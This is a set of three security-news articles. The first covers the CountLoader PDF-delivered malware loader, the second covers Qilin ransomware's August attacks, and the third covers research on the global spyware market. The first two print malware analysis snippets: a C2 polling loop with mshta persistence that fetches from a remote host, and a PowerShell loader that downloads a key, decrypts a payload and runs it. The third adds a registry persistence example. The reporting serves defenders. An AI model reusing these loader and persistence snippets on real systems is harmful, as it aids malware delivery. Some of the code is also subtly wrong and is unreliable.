In recent months, security teams have observed the emergence of a sophisticated malware loader, dubbed CountLoader, which leverages weaponized PDF files to deliver ransomware payloads.

First detected in late August 2025, CountLoader is linked to multiple Russian-speaking cybercriminal groups, including affiliates of LockBit, BlackBasta, and Qilin.

By masquerading as legitimate documents—often impersonating Ukrainian law enforcement—this loader takes advantage of social engineering and PDF exploit chains to gain an initial foothold in target environments.

CountLoader’s deployment methodology revolves around three distinct versions written in JScript (.hta), .NET, and PowerShell.

Each variant exhibits unique attributes: the JScript version offers the most comprehensive functionality with multiple download and execution methods, the .NET binary enforces a hardcoded kill switch after a preset date, and the PowerShell script persists as a concise loader with reflective in-memory execution.

Silent Push analysts noted that all variants incorporate a custom C2 communication protocol employing XOR and Base64 encryption routines to conceal their control traffic.

The impact of CountLoader extends far beyond mere initial access. Upon successful execution, the loader fingerprinted device-specific details—such as hardware identifiers, domain membership, and antivirus product presence—to generate a unique victim ID.

It then engages in persistent C2 polling loops, downloading secondary payloads such as Cobalt Strike beacons, Adaptix implants, and pureHVNC backdoors.

Organizations with domain-joined systems in Eastern Europe have been the primary targets, suggesting strategic selection of corporate and governmental entities.

CountLoader was notably delivered via a PDF-based phishing lure impersonating the National Police of Ukraine. The malicious PDF contained an embedded HTML application object that triggered mshta.exe to fetch and execute the JScript loader.

Upon opening the document, victims encountered an official-looking notification instructing them to “start your request” via an embedded link, which initiated the loader download process.

Infection Mechanism

CountLoader’s infection mechanism begins with the weaponized PDF exploiting user interaction rather than zero-day vulnerabilities.

The PDF embeds an HTA object that invokes the Windows mshta engine when clicked.

This HTA script is obfuscated using a free JavaScript obfuscator and contains around 850 lines of code.

After deobfuscation, the main loop responsible for C2 contact is visible:

for (let i = 1; i <= 10; i++) {
    let c2Url = `https://ms-team-ping${i}.com/api/getFile?fn=CheckStatus`;
    let response = CheckStatusC2ReturnDecryptedResponse(c2Url, victimFingerprint);
    if (response === "success") {
        connectAndAuthenticate(c2Url.replace("CheckStatus", "connect"), victimFingerprint);
        break;
    }
}
// Scheduled task creation for persistence
CreateScheduledTask({
    name: "GoogleUpdaterTaskSystem",
    command: `mshta https://${envVar}.example.com/start`,
    delay: "PT10M"
});

Upon successful contact, CountLoader leverages HTTP POST requests with custom Bearer tokens obtained from the C2 to fetch tasks.

These tasks include downloading executables via WinHTTP, MSXML2, Curl, Bitsadmin, or Certutil, demonstrating the loader’s adaptability and deep system knowledge.

Once tasks are executed, CountLoader reports completion back to the server, ensuring robust task management.

This infection workflow underscores CountLoader’s design as a highly modular and persistent loader, capable of delivering diverse ransomware and post-exploitation tools while evading detection through obfuscation and encrypted communications.

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.

The post New Malware Loader ‘CountLoader’ Weaponized PDF File to Deliver Ransomware appeared first on Cyber Security News.

The ransomware threat landscape witnessed a dramatic shift in August 2025 as the Qilin group claimed responsibility for 104 separate attacks worldwide.

Emerging earlier this year, Qilin quickly cemented its position through aggressive double-extortion tactics and a broad affiliate recruitment strategy.

Initial compromises have predominantly leveraged exposed Remote Desktop Protocol (RDP) servers and publicly facing VPN gateways, allowing affiliates to establish footholds before deploying the ransomware payload.

Across sectors—from manufacturing to professional services—victims reported sudden system encryption followed by data theft and extortion demands.

Cyble’s August threat landscape report highlights not only the volume of Qilin’s attacks but also the increasing sophistication of its tooling and campaigns.

Its affiliates exploit weak credentials and unpatched vulnerabilities to conduct initial reconnaissance. After lateral movement, the group executes a bespoke encryption binary, designed to target network-attached storage shares and critical file servers.

The global distribution of Qilin’s claimed victims shows the group’s reach across North America, Europe, and Asia.

Cyble analysts noted that Qilin’s payload employs a multi-stage loader, which decrypts the core ransomware executable at runtime using a dynamically generated AES key.

Once decrypted, the payload scans the local filesystem for predefined extensions—such as .docx, .xlsx, and .pdf—and applies AES-CTR encryption.

Following file encryption, Qilin writes ransom notes to each directory in a file named README_QILIN.txt. Victims are directed to a Tor-based payment portal and threatened with public data leaks if payment is not received.

In cases where organizations ignored demands, Qilin affiliates began publishing exfiltrated data on leak sites within 48 hours, accelerating the pressure on incident responders.

The rapid escalation of Qilin’s operations marks it as the most prolific ransomware group in August, nearly doubling the activity of its nearest competitor, Akira.

Beyond sheer volume, Qilin’s evolving toolkit—particularly its loader and encryption routines—demonstrates a concerted effort to evade detection and hinder remediation.

Infection Mechanism and Encryption Workflow

Qilin’s infection mechanism begins with an affiliate uploading a malicious ZIP archive, typically named to mimic legitimate software updates.

Upon execution, a PowerShell one-liner drops and launches a launcher binary (qlnldr.exe) in the %TEMP% directory. The launcher then performs the following steps:-

# Qilin loader snippet: decrypt and execute core ransomware
$encKey = (Invoke-WebRequest "http://malicious[.]site/key").Content
$encryptedPayload = Get-Content "$env:TEMP\qln_core.bin" -AsByteStream
$decrypted = New-Object System.Security.Cryptography.AesCryptoServiceProvider
$decrypted. Key = [Convert]::FromBase64String($encKey)
$decrypted. Mode = 'CTR'
$transform = $decrypted.CreateDecryptor()
$coreBytes = $transform.TransformFinalBlock($encryptedPayload, 0, $encryptedPayload.Length)
[System.IO.File]::WriteAllBytes("$env:TEMP\qilin.exe", $coreBytes)
Start-Process "$env:TEMP\qilin.exe"

Upon initialization, qilin.exe generates a unique AES session key, encrypts files across mapped drives, and exfiltrates sensitive documents over an HTTPS channel.

Persistence is achieved by registering the loader in the HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry key, ensuring execution after reboot.

While the loader’s decryption sequence and registry persistence mechanism presents the visibility into Qilin’s infection chain and aiding defenders in crafting targeted detection rules.

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.

The post Qilin Led Ransomware Attack Claimed to Compromised 104 Organizations in August appeared first on Cyber Security News.

The global spyware market continues its alarming expansion, with new research revealing the emergence of 130 additional entities spanning 46 countries between 1992 and 2024.

This shadowy ecosystem of surveillance technologies has grown from 435 documented entities in the initial assessment to 561 organizations, fundamentally reshaping the landscape of offensive cyber capabilities.

The proliferation extends far beyond traditional spyware vendors, encompassing a complex web of investors, suppliers, intermediaries, and subsidiaries that collectively fuel a multi-billion dollar market with severe implications for national security and human rights.

The market’s evolution demonstrates sophisticated organizational structures designed to obfuscate accountability and circumvent regulatory oversight.

These entities employ strategic jurisdictional arbitrage, frequently shifting corporate structures and legal identities to evade detection and sanctions.

The surveillance-for-hire industry has witnessed unprecedented growth in US-based investment, with American entities now representing the largest investor category in the global spyware ecosystem.

This surge represents a three-fold increase from previous assessments, with 31 US-based investors directing capital toward controversial spyware vendors, including those already sanctioned by the US government.

Atlantic Council analysts identified critical vulnerabilities in market transparency mechanisms that enable malicious actors to exploit regulatory gaps.

The researchers documented how resellers and brokers operate as crucial intermediaries, creating layers of obfuscation that make attribution and enforcement extraordinarily challenging.

These findings emerge from comprehensive analysis of corporate registries, leaked documentation, and transparency initiatives across multiple jurisdictions.

Of particular concern is the discovery of 43 entirely new entities that entered the spyware market specifically during 2024, highlighting the accelerating pace of market expansion despite international efforts to constrain proliferation.

The research identified new countries joining the ecosystem, including Japan, Malaysia, and Panama, while documenting the addition of 20 US-based investors who collectively channeled resources toward Israeli spyware vendors known for targeting journalists, diplomats, and civil society organizations.

The technical architecture of modern spyware operations reveals sophisticated infection mechanisms that exploit zero-day vulnerabilities and legitimate system processes to maintain persistence.

These surveillance tools demonstrate advanced capabilities including remote access trojans, keyloggers, screen capture functionality, and encrypted communication channels that enable covert data exfiltration.

The malware typically employs multi-stage deployment processes, beginning with social engineering vectors or exploit kits that compromise target devices before establishing command and control infrastructure.

Advanced Persistence and Evasion Techniques

Contemporary spyware implementations leverage sophisticated persistence mechanisms that operate at multiple system levels to maintain long-term access to compromised devices.

These tools employ rootkit-like functionality to embed themselves deep within operating system kernels, utilizing legitimate system processes to mask malicious activities from security monitoring solutions.

The malware frequently implements process hollowing techniques, injecting malicious code into trusted system processes such as svchost.exe or explorer.exe to appear legitimate to security scanners.

The infection chain typically begins with exploitation of browser vulnerabilities or messaging applications, followed by privilege escalation routines that grant system-level access.

Once established, the spyware creates multiple persistence points including registry modifications, scheduled tasks, and service installations that ensure survival across system reboots and security updates.

Modern variants implement sophisticated anti-analysis techniques, including virtual machine detection, debugger evasion, and code obfuscation to prevent reverse engineering efforts.

Registry Persistence Example:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"SystemUpdate" = "C:\Windows\System32\svchost.exe -k netsvcs"

The command and control infrastructure demonstrates remarkable resilience through domain generation algorithms and encrypted communication protocols that make network-based detection challenging.

These systems often utilize legitimate cloud services as proxy layers, routing surveillance data through compromised infrastructure to obscure the ultimate destination.

The malware maintains operational security through certificate pinning, traffic obfuscation, and the use of popular communication protocols that blend seamlessly with normal network traffic.

Detection evasion capabilities include real-time monitoring of security software processes, with the ability to suspend operations when analysis tools are detected.

The spyware frequently implements sandbox evasion techniques, checking for virtual machine artifacts, mouse movement patterns, and system resource limitations that indicate automated analysis environments.

This sophisticated defensive posture ensures that samples submitted for analysis often remain dormant, preventing researchers from understanding their true capabilities and attribution markers.

The research demonstrates how resellers and brokers create misleading contractual structures that obscure both the genuine products being sold and their original vendors, as documented in official Mexican government transparency releases regarding NSO Group’s Pegasus distribution network.

These intermediaries distort pricing mechanisms for exploits and capabilities while connecting vendors to new regional markets, creating enforcement challenges that undermine international accountability efforts.

The systematic documentation of this marketplace provides crucial intelligence for policymakers seeking to address the proliferation of surveillance technologies that threaten democratic institutions and human rights defenders worldwide.

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.

The post Global Spyware Markets to Identify New Entities Entering The Market appeared first on Cyber Security News.